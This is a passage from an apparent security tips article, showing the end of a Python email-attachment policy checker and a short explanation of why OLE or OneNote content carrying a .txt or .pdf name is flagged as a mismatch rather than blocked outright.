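    return {name: evaluate(name, data) for name, data in attachments}


if __name__ == "__main__":
    for name, r in run_policy().items():
        print(f"{r['verdict']:5} {name:18} {r['content']:8} {'; '.join(r['reasons'])}")
```

The OLE check is deliberately a mismatch test rather than a block: a legacy .doc is an OLE file too, and those are the cases Protected View already handles. What should never pass is OLE or OneNote content wearing a .txt or .pdf name, because the only reason to do that is to get past a filter.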



Older Security Tips can be requested at info@10dsecurity.com